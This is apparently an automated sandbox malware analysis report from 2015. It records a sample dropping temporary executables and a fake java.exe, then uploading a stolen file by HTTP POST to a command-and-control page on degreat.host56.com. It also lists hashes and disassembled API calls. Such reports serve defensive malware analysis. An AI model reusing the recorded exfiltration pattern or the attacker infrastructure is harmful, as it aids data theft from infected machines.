Sep 7, 2015 18:53:24.807142973 CEST	80	49171	31.170.160.229	192.168.1.12	HTTP/1.1 200 OK Date: Mon, 07 Sep 2015 16:53:24 GMT Server: Apache X-Powered-By: PHP/5.2.17 Content-Length: 170 Connection: close Content-Type: text/html Data Raw: 4f 4b 41 59 42 4e 44 4b 58 33 32 34 32 34 20 0a 0d 0a 3c 21 2d 2d 20 48 6f 73 74 69 6e 67 32 34 20 41 6e 61 6c 79 74 69 63 73 20 43 6f 64 65 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 73 74 61 74 73 2e 68 6f 73 74 69 6e 67 32 34 2e 63 6f 6d 2f 63 6f 75 6e 74 2e 70 68 70 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 21 2d 2d 20 45 6e 64 20 4f 66 20 41 6e 61 6c 79 74 69 63 73 20 43 6f 64 65 20 2d 2d 3e 0d 0a Data Ascii: OKAYBNDKX32424 Hosting24 Analytics Code --><script type="text/javascript" src="http://stats.hosting24.com/count.php"></script> End Of Analytics Code -->	15
Sep 7, 2015 18:53:27.321223021 CEST	49172	80	192.168.1.12	31.170.160.229	POST /email.php HTTP/1.1 Content-Length: 1386 Accept: text/html, / Content-Type: multipart/form-data; boundary=---------------------------090715185326217 User-Agent: Mozilla/3.0 (compatible; TALWinInetHTTPClient) Host: degreat.host56.com Connection: Keep-Alive Cache-Control: no-cache	15
Sep 7, 2015 18:53:27.321363926 CEST	49172	80	192.168.1.12	31.170.160.229	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 30 39 30 37 31 35 31 38 35 33 32 36 32 31 37 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 Data Ascii: -----------------------------090715185326217Content-Type: application/octet-streamContent-Disposition: form-data; name="userfile"; filename="C:\Users\admin\AppData\Roaming\8357.bcf"xUQO0~p[VZH"AaV4%l?;4b	17
Sep 7, 2015 18:53:27.788897991 CEST	80	49172	31.170.160.229	192.168.1.12	HTTP/1.1 200 OK Date: Mon, 07 Sep 2015 16:53:27 GMT Server: Apache X-Powered-By: PHP/5.2.17 Content-Length: 768 Connection: close Content-Type: text/html Data Raw: 3c 62 72 3e 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 27 31 27 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 27 32 27 20 62 67 63 6f 6c 6f 72 3d 27 23 46 46 46 46 44 46 27 20 62 6f 72 64 65 72 63 6f 6c 6f 72 3d 27 23 45 38 42 39 30 30 27 20 61 6c 69 67 6e 3d 27 63 65 6e 74 65 72 27 3e 3c 74 72 3e 3c 74 64 3e 3c 66 6f 6e 74 20 66 61 63 65 3d 27 41 72 69 61 6c 27 20 73 69 7a 65 3d 27 31 27 20 63 6f 6c 6f 72 3d 27 23 30 30 30 30 30 30 27 3e 3c 62 3e 50 48 50 20 45 72 72 6f 72 20 4d 65 73 73 61 67 65 3c 2f 62 3e 3c 2f 66 6f 6e 74 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 62 72 20 2f 3e 0a 3c 62 3e 57 61 72 6e 69 6e 67 3c 2f 62 3e 3a 20 20 6d 6b 64 69 72 28 29 20 5b 3c 61 20 68 72 65 66 3d 27 66 75 6e 63 74 69 6f 6e 2e 6d 6b 64 69 72 27 3e 66 75 6e 63 74 69 6f 6e 2e 6d 6b 64 69 72 3c 2f 61 3e 5d 3a 20 46 69 6c 65 20 65 78 69 73 74 73 20 69 6e 20 3c 62 3e 2f 68 6f 6d 65 2f 61 35 34 39 37 30 34 31 2f 70 75 62 6c 69 63 5f 68 74 6d 6c 2f 65 6d 61 69 6c 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 Data Ascii: <br><table border='1' cellpadding='2' bgcolor='#FFFFDF' bordercolor='#E8B900' align='center'><tr><td><font face='Arial' size='1' color='#000000'><b>PHP Error Message</b></font></td></tr></table><br /><b>Warning</b>: mkdir() [<a href='function.mkdir'>function.mkdir</a>]: File exists in <b>/home/a5497041/public_html/email.php</b> on	18
Sep 7, 2015 18:53:27.838538885 CEST	80	49172	31.170.160.229	192.168.1.12	Data Raw: 6c 69 6e 65 20 3c 62 3e 39 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 3e 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 27 31 27 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 27 32 27 20 62 67 63 6f 6c 6f 72 3d 27 23 46 46 46 46 44 46 27 20 62 6f 72 64 65 Data Ascii: line <b>91</b><br /><br><table border='1' cellpadding='2' bgcolor='#FFFFDF' bordercolor='#E8B900' align='center'><tr><td><div align='center'><a href='http://www.000webhost.com/'><font face='Arial' size='1' color='#000000'>Free Web Hosting</fo	18

Hooks - Code Manipulation Behavior

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

Analysis Process: 40D19FBA73C6B011814E2C6920E8792F.exe PID: 3336 Parent PID: 2864

General

Start time:	18:52:13
Start date:	07/09/2015
Path:	C:\40D19FBA73C6B011814E2C6920E8792F.exe
Wow64 process (32bit):	false
Commandline:	unknown
Imagebase:	0x400000
File size:	2423296 bytes
MD5 hash:	40D19FBA73C6B011814E2C6920E8792F

Chronological Activities

Analysis Process: notepad.exe PID: 3376 Parent PID: 2232

General

Start time:	18:52:36
Start date:	07/09/2015
Path:	C:\Windows\System32\notepad.exe
Wow64 process (32bit):	false
Commandline:	unknown
Imagebase:	0x950000
File size:	179712 bytes
MD5 hash:	D378BFFB70923139D6A4F546864AA61C

Chronological Activities

Analysis Process: 40D19FBA73C6B011814E2C6920E8792F.exe PID: 3388 Parent PID: 3336

General

Start time:	18:52:43
Start date:	07/09/2015
Path:	C:\40D19FBA73C6B011814E2C6920E8792F.exe
Wow64 process (32bit):	false
Commandline:	C:\40D19FBA73C6B011814E2C6920E8792F.exe
Imagebase:	0x400000
File size:	2423296 bytes
MD5 hash:	40D19FBA73C6B011814E2C6920E8792F

Chronological Activities

Analysis Process: FB_3449.tmp.exe PID: 3408 Parent PID: 3388

General

Start time:	18:52:44
Start date:	07/09/2015
Path:	C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe
Imagebase:	0x400000
File size:	561152 bytes
MD5 hash:	FBDEC6F2A565E5B6844A7DE2F785EC88

Chronological Activities

Analysis Process: FB_3804.tmp.exe PID: 3416 Parent PID: 3388

General

Start time:	18:52:44
Start date:	07/09/2015
Path:	C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe
Imagebase:	0x75420000
File size:	912416 bytes
MD5 hash:	BA2A65C19C961A51739E28DF238FB0EA

Chronological Activities

Analysis Process: FB_390E.tmp.exe PID: 3424 Parent PID: 3388

General

Start time:	18:52:45
Start date:	07/09/2015
Path:	C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe
Imagebase:	0x76a30000
File size:	1222772 bytes
MD5 hash:	9C306303F6656435500A6A3C53793758

Chronological Activities

Analysis Process: FB_3804.tmp.exe PID: 3544 Parent PID: 3416

General

Start time:	18:53:09
Start date:	07/09/2015
Path:	C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe
Imagebase:	0x400000
File size:	912416 bytes
MD5 hash:	BA2A65C19C961A51739E28DF238FB0EA

Chronological Activities

Analysis Process: FB_3449.tmp.exe PID: 3552 Parent PID: 3408

General

Start time:	18:53:10
Start date:	07/09/2015
Path:	C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe
Imagebase:	0x77290000
File size:	561152 bytes
MD5 hash:	FBDEC6F2A565E5B6844A7DE2F785EC88

Chronological Activities

Analysis Process: FB_390E.tmp.exe PID: 3560 Parent PID: 3424

General

Start time:	18:53:10
Start date:	07/09/2015
Path:	C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe
Imagebase:	0x400000
File size:	1222772 bytes
MD5 hash:	9C306303F6656435500A6A3C53793758

Chronological Activities

Analysis Process: iexplore.exe PID: 3608 Parent PID: 3560

General

Start time:	18:53:13
Start date:	07/09/2015
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Internet Explorer\iexplore.exe
Imagebase:	0x767d0000
File size:	815288 bytes
MD5 hash:	363BC25BACB34E9D40441968B1B3D5BE

Chronological Activities

Analysis Process: java.exe PID: 3768 Parent PID: 3552

General

Start time:	18:53:22
Start date:	07/09/2015
Path:	C:\Users\admin\AppData\Roaming\Java\java.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\admin\AppData\Roaming\Java\java.exe
Imagebase:	0x77290000
File size:	561152 bytes
MD5 hash:	FBDEC6F2A565E5B6844A7DE2F785EC88

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: 40D19FBA73C6B011814E2C6920E8792F.exe PID: 3336 Parent PID: 2864

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	8.1%
Total number of Nodes:	491
Total number of Limit Nodes:	3

Executed Functions

Function 00405B44, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0045C08C,?,00405934,00400000,?,00000105,00000001,004101C4,00405970,00406450,0000FF94,?), ref: 00405B60
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0045C08C,?,00405934,00400000,?,00000105,00000001), ref: 00405B7E
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0045C08C), ref: 00405B9C
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405BBA

Part of subcall function 0040598C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 004059A9
Part of subcall function 0040598C: GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004059BA
Part of subcall function 0040598C: lstrcpyn.KERNEL32(?,?,?,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 004059EA
Part of subcall function 0040598C: lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405A4E
Part of subcall function 0040598C: lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49,?,80000001), ref: 00405A83
Part of subcall function 0040598C: FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000,00405C49), ref: 00405A96
Part of subcall function 0040598C: FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC,00000000), ref: 00405AA3
Part of subcall function 0040598C: lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0045C08C,?,00405BEC), ref: 00405AAF
Part of subcall function 0040598C: lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405AE3
Part of subcall function 0040598C: lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405AEF
Part of subcall function 0040598C: lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405B11

RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405C03
RegQueryValueExA.ADVAPI32(?,00405DB0,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405C49,?,80000001), ref: 00405C21
RegCloseKey.ADVAPI32(?,00405C50,00000000,00000000,00000005,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405C43
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405C60
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405C6D
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405C73
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405C9E
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405CE5
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405CF5
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405D1D
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405D2D
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405D53
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405D63

Strings

Software\Borland\Delphi\Locales, xrefs: 00405BB0
Software\Borland\Locales, xrefs: 00405B74, 00405B92

Memory Dump Source

Source File: 00000002.00000002.185847170.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.185835403.00400000.00000002.sdmp
Associated: 00000002.00000002.185907022.0045C000.00000004.sdmp
Associated: 00000002.00000002.185932219.0045D000.00000008.sdmp
Associated: 00000002.00000002.185954184.00464000.00000004.sdmp
Associated: 00000002.00000002.185975108.00466000.00000008.sdmp
Associated: 00000002.00000002.186000481.00468000.00000004.sdmp
Associated: 00000002.00000002.186023568.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00405C50, Relevance: 15.1, APIs: 10, Instructions: 98

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405C60
GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405C6D
GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405C73
lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405C9E
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405CE5
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405CF5
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405D1D
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405D2D
lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405D53
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405D63

Strings

Software\Borland\Delphi\Locales, xrefs: 00405BB0
Software\Borland\Locales, xrefs: 00405B74, 00405B92

Memory Dump Source

Source File: 00000002.00000002.185847170.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.185835403.00400000.00000002.sdmp
Associated: 00000002.00000002.185907022.0045C000.00000004.sdmp
Associated: 00000002.00000002.185932219.0045D000.00000008.sdmp
Associated: 00000002.00000002.185954184.00464000.00000004.sdmp
Associated: 00000002.00000002.185975108.00466000.00000008.sdmp
Associated: 00000002.00000002.186000481.00468000.00000004.sdmp
Associated: 00000002.00000002.186023568.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00401A54, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48

APIs

RtlInitializeCriticalSection.KERNEL32(004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401A6A
RtlEnterCriticalSection.KERNEL32(004645C4,004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401A7D
LocalAlloc.KERNEL32(00000000,00000FF8,004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401AA7
RtlLeaveCriticalSection.KERNEL32(004645C4,00401B11,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401B04

Strings

M!, xrefs: 00401A5A

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00402140, Relevance: 3.1, APIs: 2, Instructions: 124

APIs

RtlEnterCriticalSection.KERNEL32(004645C4,00000000,004022BC), ref: 0040218B
RtlLeaveCriticalSection.KERNEL32(004645C4,004022C3), ref: 004022B6

Part of subcall function 00401A54: RtlInitializeCriticalSection.KERNEL32(004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401A6A
Part of subcall function 00401A54: RtlEnterCriticalSection.KERNEL32(004645C4,004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401A7D
Part of subcall function 00401A54: LocalAlloc.KERNEL32(00000000,00000FF8,004645C4,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401AA7
Part of subcall function 00401A54: RtlLeaveCriticalSection.KERNEL32(004645C4,00401B11,00000000,M!,?,?,004022EE,00464604,00000000,00000000,?,?,00401CDD,00401CF2,00401E43), ref: 00401B04

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 0040156C, Relevance: 2.5, APIs: 2, Instructions: 37

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401875), ref: 0040159B
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401875), ref: 004015C2

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00406420, Relevance: 1.5, APIs: 1, Instructions: 31

APIs

LoadStringA.USER32(00000000,0000FF94,?,00000400), ref: 00406451

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 004070FE, Relevance: 1.5, APIs: 1, Instructions: 28

APIs

CreateWindowExA.USER32(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 00407129

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00405908, Relevance: 1.5, APIs: 1, Instructions: 26

APIs

GetModuleFileNameA.KERNEL32(00400000,?,00000105,00000001,004101C4,00405970,00406450,0000FF94,?,00000400,?,004101C4,00413D13,00000000,00413D38), ref: 00405926

Part of subcall function 00405B44: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,0045C08C,?,00405934,00400000,?,00000105,00000001,004101C4,00405970,00406450,0000FF94,?), ref: 00405B60
Part of subcall function 00405B44: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0045C08C,?,00405934,00400000,?,00000105,00000001), ref: 00405B7E
Part of subcall function 00405B44: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,00000001,0045C08C), ref: 00405B9C
Part of subcall function 00405B44: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00405BBA
Part of subcall function 00405B44: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405C03
Part of subcall function 00405B44: RegQueryValueExA.ADVAPI32(?,00405DB0,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,00405C49,?,80000001), ref: 00405C21
Part of subcall function 00405B44: RegCloseKey.ADVAPI32(?,00405C50,00000000,00000000,00000005,00000000,00405C49,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00405C43
Part of subcall function 00405B44: lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 00405C60
Part of subcall function 00405B44: GetThreadLocale.KERNEL32(00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 00405C6D
Part of subcall function 00405B44: GetLocaleInfoA.KERNEL32(00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 00405C73
Part of subcall function 00405B44: lstrlen.KERNEL32(00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 00405C9E
Part of subcall function 00405B44: lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405CE5
Part of subcall function 00405B44: LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405CF5
Part of subcall function 00405B44: lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 00405D1D
Part of subcall function 00405B44: LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 00405D2D
Part of subcall function 00405B44: lstrcpyn.KERNEL32(00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001,00000005,?,?), ref: 00405D53
Part of subcall function 00405B44: LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000002,00000001,00000000,00000105,00000000,00000000,00000003,00000001), ref: 00405D63

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
Associated: 00000002.00000001.115812009.0045C000.00000004.sdmp
Associated: 00000002.00000001.115815800.0045D000.00000008.sdmp
Associated: 00000002.00000001.115819814.00464000.00000004.sdmp
Associated: 00000002.00000001.115823638.00466000.00000008.sdmp
Associated: 00000002.00000001.115827413.00468000.00000004.sdmp
Associated: 00000002.00000001.115830934.00469000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_1_400000_40D19FBA73C6B011814E2C6920E8792F.jbxd

Function 00401700, Relevance: 1.3, APIs: 1, Instructions: 54

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 0040176D

Memory Dump Source

Source File: 00000002.00000001.115803017.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000001.115783238.00400000.00000002.sdmp
